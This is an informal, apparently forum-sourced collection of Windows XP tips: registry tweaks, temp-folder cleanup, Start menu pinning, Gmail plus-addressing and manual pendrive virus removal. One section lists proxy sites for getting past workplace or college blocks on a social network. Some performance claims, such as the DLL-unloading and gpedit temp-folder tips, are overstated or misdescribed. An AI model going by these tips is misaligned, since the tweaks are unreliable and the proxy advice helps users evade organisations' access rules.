[HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Explorer]
"AlwaysUnloadDLL"=dword:00000001

XP has a bad habit of keeping dynamic link libraries that are no longer in use resident in memory. Not only do the DLLs use up precious memory space, but they also tend to cause stability problems in some systems. To force XP to unload any DLLs in memory when the application that called them is no longer in memory, browse to HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Explorer and find the DWORD "AlwaysUnloadDLL". You may need to create this key. Set the value to 1 to force the operating system to unload DLLs.

Give 16-bit apps their own separate processes
*********************************************
[HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ WOW]
"DefaultSeparateVDM"="Yes"

By default, Windows XP will only open one 16-bit process and cram all 16-bit apps running on the system at a given time into that process. This simulates how MS-DOS based systems viewed systems and is necessary for some older applications that run together and share resources. However, most 16-bit applications work perfectly well by themselves and would benefit from the added performance and stability of their own dedicated resources. To force Windows XP to give each 16-bit application it's own resources, browse to HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ WOW and find the String "DefaultSeparateVDM". If it is not there, you may need to create it. Set the value of this to Yes to give each 16-bit application its own process, and No to have the 16-bit application all run in the same memory space.

Disable User Tracking
*********************
[HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer]
"NoInstrumentation"=dword:00000001

The user tracking system built into Windows XP is useless to 99% of users (there are very few uses for the information collected other than for a very nosy system admin), and it uses up precious resources to boot, so it makes sense to disable this "feature" of Windows XP. To do so, browse to HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer and find the DWORD "NoInstrumentation". You may need to create this key if it is not there. The default setting is 0, but setting it to 1 will disable most of the user tracking features of the system.

Thumbnail Cache
***************
[HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Explorer \ Advanced]
"DisableThumbnailCache"=dword:00000001

Windows XP has a neat feature for graphic and video files that creates a "thumbnail" of the image or first frame of the video and makes it into an oversized icon for the file. There are two ways that Explorer can do this, it can create them fresh each time you access the folder or it can load them from a thumbnail cache. The thumbnail caches on systems with a large number of image and video files can become staggeringly large. To disable the Thumbnail Cache, browse to HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Explorer \ Advanced and find the DWORD "DisableThumbnailCache". You may need to create this key. A setting of 1 is recommended for systems where the number of graphic and video files is large, and a setting of 0 is recommended for systems not concerned about hard drive space, as loading the files from the cache is significantly quicker than creating them from scratch each time a folder is accessed.

How to Auto Delete %temp% file

what i prefer is %temp% " without quotes.. at Start -> Run..
this opens ur temp folder n den u cal erase it neatly// still try dis one too..


First go into gpedit.msc
Next select -> Computer Configuration/Administrative Templates/Windows Components/Terminal Services/Temporary Folder
Then right click "Do Not Delete Temp Folder Upon Exit"
Go to properties and hit disable. Now next time Windows puts a temp file in that folder it will automatically delete it when its done! Note from Forum Admin: Remember, GPEDIT (Group Policy Editor) is only available in XP Pro.

5 Useful xp tricks

The Windows XP start menu
The Windows XP start menu is one of the most important menus in Windows. But is seems to have a mind of its own.

Don't you agree that YOU should decide what goes on this menu ?

The Most Frequently Used (MFU) list
Did you notice that it has a "most frequently used" list ? This list keeps track of how often programs are used. It is the portion of the start menu between "All Programs" and the horizontal line under the "pinned" items.

The population of your MFU list may seem strange at times. Maybe you see programs that you haven't used in ages. Maybe you don't see programs that you'd expect to see. And even if the content seems logical, the list "lives", so you can never count on a program to be there.

To make the content of the start menu more reliable, it may be a good idea to decrease the size of the MFU list a bit and make more room for the "pinned" list.

The programs, documents, web sites, ... that you put on the pinned list are there to stay. Once you put them there, you can count on them to be there. Your default web browser and e-mail program are on the pinned list by default, but you can remove them if you want.

How to put a program on the pinned list ?
Click on the start button and navigate to the program that you want on the pinned list
Right-click this program and select "Pin to Start menu"



A document that you use often on the pinned list ?
Open Windows Explorer, navigate to that document, right-click and drag that document to the Start button and release the right mouse button when your mouse pointer is on the Start button.

An often visited web site on the pinned list ?
Fire up your web browser and make sure that it's not maximized so that you can also see some of your desktop
Go to the web page that you want to pin to the start menu
click and hold the pictogram next to the url in the address bar and drag the icon to your desktop



The icon that you need to drag to your desktop

Windows puts a shortcut on your desktop. Click this shortcut and drag it to your start button. The shortcut is now on your pinned list and you can safely remove it from your desktop to tidy up.

More room for the pinned listIf you put too many icons on your Windows XP Start menu pinned list, Windows may start to worry about the start menu real estate and bug you with messages. By decreasing the number of items on the "most frequently used" list, you make more room available for the pinned list.

.Right-click the start button
.Select properties
.Click the tab "Start Menu"
.Click the button "Customize"
.In the "Programs" section, decrease the "Number of programs on Start menu"
.You might also want to select the radio button "Small icons" in this dialog to have more space on the Start menu
.Click ok
.Click ok once more

Open orkut in blocked PC's

hi friends u can open any types of websites from following links if it banned..
enjoy

*www.mathtunnel.com
*www.gravitywars.com
*www.kproxy.com
*www.calculatepie.com
*http://www.anonymizer.com/

Open the above sites and just type in http://www.orkut.com in companies or colleges where its blocked n enjoy

Use gmail generate unlimited E-mail address

Gmail has an interesting quirk where you can add a plus sign (+) after your Gmail address, and it'll still get to your inbox. It's called plus-addressing, and it essentially gives you an unlimited number of e-mail addresses to play with. Here's how it works: say your address is pinkyrocks@gmail.com, and you want to automatically label all work e-mails. Add a plus sign and a phrase to make it pinkyrocks+work@gmail.com and set up a filter to label it work (to access your filters go to Settings->Filters and create a filter for messages addressed to pinkyrocks+work@gmail.com. Then add the label work).

More real world examples:

Find out who is spamming you: Be sure to use plus-addressing for every form you fill out online and give each site a different plus address.

Example: You could use
pinkyrocks+nytimes@gmail.com for nytimes.com
pinkyrocks+freestuff@gmail.com for freestuff.com
Then you can tell which site has given your e-mail address to spammers, and automatically send them to the trash.

Automatically label your incoming mail: I've talked about that above.

Archive your mail: If you receive periodic updates about your bank account balance or are subscribed to a lot of mailing lists that you don't check often, then you can send that sort of mail to the archives and bypass your Inbox.

Example: For the mailing list, you could give pinkyrocks+mailinglist1@gmail.com as your address, and assign a filter that will archive mail to that address automatically. Then you can just check in once in a while on the archive if you want to catch up.

Update (9/7): Several commentors have indicated that this is not a Gmail specific trick. kl says Fastmail has enabled this feature as well. caliban10 reports that a lot of sites reject addresses with a plus sign. You might use other services like Mailinator for disposable addresses instead. pbinder recommends using services like SpamGourmet, which redirects mail to your real address.

Prevent Pendrive virus

Prevent PenDrive Virus
:: Do the following ::

1) Disable autorun/autoplay function of your pen drive.

2) Now plugin your pen drive and open any folder of your computer.
(Do not open any folder from ur pen drive.)

3) Now goto tools then select Folder Option
In that box mark the Show Hidden Files & Folders option.
Also Uncheck Hide Extension for known file types & Hide Protected OS files.

Now click apply and ok buttons and close that folder.

4) Nome come to desktop.
On the Desktop, click on windows Start button and select Search for files & folders.

When the search dialog box appears on the screen, in that click on All Files & Folders, now click on More Advanced Options then select search Hidden files & folders.


Now go above & in Look In option, select your pendrive letter (For example E: Or G:)
and hit Enter.

5) Now if you see any unknown .Exefiles, simply delete them all.